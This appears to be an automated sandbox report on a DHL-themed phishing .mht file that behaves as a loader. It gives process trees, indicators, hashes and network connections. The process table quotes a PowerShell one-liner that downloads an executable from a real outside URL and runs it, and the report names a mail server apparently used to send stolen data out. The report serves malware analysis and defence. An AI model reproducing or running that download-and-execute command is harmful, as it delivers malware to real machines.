Malware analysis DHL_TRACKING_RECEIPT.mht Malicious activity

Add for printing

File name:	DHL_TRACKING_RECEIPT.mht
Full analysis:	https://app.any.run/tasks/5a87ba9e-68ad-4597-ae26-8d50427df7a5
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Malware Trends Tracker >>>
Analysis date:	May 15, 2019, 18:09:50
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	loader autoit
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	EAC7AF5085936BFF9E4EB3A3C0309ECF
SHA1:	23F6360FC88B29E703DE11489F838F943C5BADA6
SHA256:	596DA49016CE7166461738C27F27091450E54E4AFE5D53C4D105A6A4F7C6DDE2
SSDEEP:	6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ9MfzCjSRPbowvn:4Q0AQQYf2j3VTr9ezCjbwv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (73.0.3683.75)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Executes PowerShell scripts
  - cmd.exe (PID: 3684)
- Application was dropped or rewritten from another process
  - bgl.exe (PID: 940)
  - created.exe (PID: 3608)
  - bgl.exe (PID: 4044)
- Changes settings of System certificates
  - mshta.exe (PID: 2564)
- Changes the autorun value in the registry
  - bgl.exe (PID: 940)
- Downloads executable files from the Internet
  - powershell.exe (PID: 2256)
- Actions looks like stealing of personal data
  - RegSvcs.exe (PID: 1520)
SUSPICIOUS
- Executable content was dropped or overwritten
  - powershell.exe (PID: 2256)
  - created.exe (PID: 3608)
- Starts CMD.EXE for commands execution
  - mshta.exe (PID: 2564)
- Adds / modifies Windows certificates
  - mshta.exe (PID: 2564)
- Creates files in the user directory
  - powershell.exe (PID: 2256)
- Drop AutoIt3 executable file
  - created.exe (PID: 3608)
- Reads Windows Product ID
  - RegSvcs.exe (PID: 1520)
- Reads Environment values
  - RegSvcs.exe (PID: 1520)
- Loads DLL from Mozilla Firefox
  - RegSvcs.exe (PID: 1520)
INFO
- Changes internet zones settings
  - iexplore.exe (PID: 3960)
- Creates files in the user directory
  - iexplore.exe (PID: 2144)
  - iexplore.exe (PID: 2632)
- Reads Internet Cache Settings
  - iexplore.exe (PID: 3960)
  - iexplore.exe (PID: 2144)
  - iexplore.exe (PID: 2632)
- Reads internet explorer settings
  - iexplore.exe (PID: 2144)
  - mshta.exe (PID: 2564)
  - iexplore.exe (PID: 2632)
- Reads Microsoft Office registry keys
  - iexplore.exe (PID: 3960)
- Application launched itself
  - iexplore.exe (PID: 3960)
- Reads settings of System Certificates
  - iexplore.exe (PID: 3960)
- Adds / modifies Windows certificates
  - iexplore.exe (PID: 3960)
- Changes settings of System certificates
  - iexplore.exe (PID: 3960)
- Dropped object may contain Bitcoin addresses
  - created.exe (PID: 3608)
  - bgl.exe (PID: 4044)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3960	"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\admin\AppData\Local\Temp\DHL_TRACKING_RECEIPT.mht	C:\Program Files\Internet Explorer\iexplore.exe		explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255)
2144	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3960 CREDAT:79873	C:\Program Files\Internet Explorer\iexplore.exe	—	iexplore.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255)
2632	"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3960 CREDAT:137473	C:\Program Files\Internet Explorer\iexplore.exe		iexplore.exe
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Version: 8.00.7600.16385 (win7_rtm.090713-1255)
2564	C:\Windows\System32\mshta.exe -Embedding	C:\Windows\System32\mshta.exe		svchost.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255)
3684	"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('http://www.olympusmotel.com.br/new/el.exe','%temp%\created.exe'); Start '%temp%\created.exe'	C:\Windows\System32\cmd.exe	—	mshta.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2256	powershell (new-object System.Net.WebClienT).DownloadFile('http://www.olympusmotel.com.br/new/el.exe','C:\Users\admin\AppData\Local\Temp\created.exe'); Start 'C:\Users\admin\AppData\Local\Temp\created.exe'	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
3608	"C:\Users\admin\AppData\Local\Temp\created.exe"	C:\Users\admin\AppData\Local\Temp\created.exe		powershell.exe
User: admin Integrity Level: MEDIUM Exit code: 0
2468	C:\Windows\system32\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}	C:\Windows\system32\DllHost.exe	—	svchost.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: COM Surrogate Version: 6.1.7600.16385 (win7_rtm.090713-1255)
4044	"C:\Users\admin\AppData\Local\Temp\51134005\bgl.exe" sdr=llj	C:\Users\admin\AppData\Local\Temp\51134005\bgl.exe	—	created.exe
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 14, 5
940	C:\Users\admin\AppData\Local\Temp\51134005\bgl.exe C:\Users\admin\AppData\Local\Temp\51134005\EELRU	C:\Users\admin\AppData\Local\Temp\51134005\bgl.exe		bgl.exe
User: admin Company: AutoIt Team Integrity Level: MEDIUM Description: AutoIt v3 Script Exit code: 0 Version: 3, 3, 14, 5

Add for printing

Total events

1 687

Read events

1 488

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3960	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\favicon[1].ico		—
		MD5:—	SHA256:—
3960	iexplore.exe	C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico		—
		MD5:—	SHA256:—
2144	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\wbk43D5.tmp		text
		MD5:F66AF5C600253C110C5845FFDEE4D7EF	SHA256:DDC72FB3512100646ABEEB5F21D733A65C9564BBD6EE65D316E22A3EABD80530
2144	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012019051520190516\index.dat		dat
		MD5:A89191F7CAB553E7AEA59C8711F57670	SHA256:11ACA94297BE19E6CF6D17FA7C5A4064A53848F4DBD760AEF003929BBD8AD949
2632	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\0ZNSKQTC\DHL_TRACKING_RECEIPT[1].hta		html
		MD5:907C6C7A39AF8BCA0F4A319B82C89CC4	SHA256:E900DCB0C397F57FF5EAAA46398A7DDE85F9CD86C737A95116BD3E340B545646
2632	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat		dat
		MD5:7CE31FA428770BF6B63EFA8EC6486CE7	SHA256:4BAA86C5BF54BFA97AEC11D61A4FF1A13B8238492705D90AFE953537B647317C
2632	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat		dat
		MD5:520AE1D99842BA0148D3ED0FEE3FD5AB	SHA256:E60C28E2010F847787E8CE24ECA7A892AD569830A226C6CC22B66F3863423E75
2632	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012019051520190516\index.dat		dat
		MD5:2F0D9349784684BFBA5B3C589FEECCE5	SHA256:1713954C4AECC5B71CE3876C7380E3AC890F3DB072B9A5F52F2A0D54D4B8CEEF
2144	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\wbk423D.tmp		text
		MD5:F66AF5C600253C110C5845FFDEE4D7EF	SHA256:DDC72FB3512100646ABEEB5F21D733A65C9564BBD6EE65D316E22A3EABD80530
2632	iexplore.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\OHW2AGQ4\desktop.ini		ini
		MD5:4A3DEB274BB5F0212C2419D3D8D08612	SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2256	powershell.exe	GET	200	187.49.226.17:80	http://www.olympusmotel.com.br/new/el.exe	BR	executable	1.06 Mb	suspicious
3960	iexplore.exe	GET	200	204.79.197.200:80	http://www.bing.com/favicon.ico	US	image	237 b	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	204.79.197.200:80	www.bing.com	Microsoft Corporation	US	whitelisted
2256	powershell.exe	187.49.226.17:80	www.olympusmotel.com.br	Linha Livre Internet Ltda	BR	suspicious
1520	RegSvcs.exe	68.65.122.52:26	mail.globalfinancel.com	Namecheap, Inc.	US	malicious
2632	iexplore.exe	190.107.177.57:443	blancoabogados.cl	Gtd Internet S.A.	CL	unknown
2564	mshta.exe	190.107.177.57:443	blancoabogados.cl	Gtd Internet S.A.	CL	unknown

DNS requests

Domain	IP	Reputation
www.bing.com	204.79.197.200 13.107.21.200	whitelisted
blancoabogados.cl	190.107.177.57	unknown
www.olympusmotel.com.br	187.49.226.17	suspicious
mail.globalfinancel.com	68.65.122.52	malicious

Threats

PID	Process	Class	Message
2256	powershell.exe	Potentially Bad Traffic	ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
2256	powershell.exe	Potential Corporate Privacy Violation	ET POLICY PE EXE or DLL Windows file download HTTP
2256	powershell.exe	Potentially Bad Traffic	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download

Add for printing

No debug info

General Info

DHL_TRACKING_RECEIPT.mht

EAC7AF5085936BFF9E4EB3A3C0309ECF

23F6360FC88B29E703DE11489F838F943C5BADA6

596DA49016CE7166461738C27F27091450E54E4AFE5D53C4D105A6A4F7C6DDE2

6:4Q0kJQQ8a0NNEXW0Yfcvj3VTfCQ9MfzCjSRPbowvn:4Q0AQQYf2j3VTr9ezCjbwv

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Executes PowerShell scripts

Application was dropped or rewritten from another process

Changes settings of System certificates

Changes the autorun value in the registry

Downloads executable files from the Internet

Actions looks like stealing of personal data

SUSPICIOUS

Executable content was dropped or overwritten

Starts CMD.EXE for commands execution

Adds / modifies Windows certificates

Creates files in the user directory

Drop AutoIt3 executable file

Reads Windows Product ID

Reads Environment values

Loads DLL from Mozilla Firefox

INFO

Changes internet zones settings

Creates files in the user directory

Reads Internet Cache Settings

Reads internet explorer settings

Reads Microsoft Office registry keys

Application launched itself

Reads settings of System Certificates

Adds / modifies Windows certificates

Changes settings of System certificates

Dropped object may contain Bitcoin addresses

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings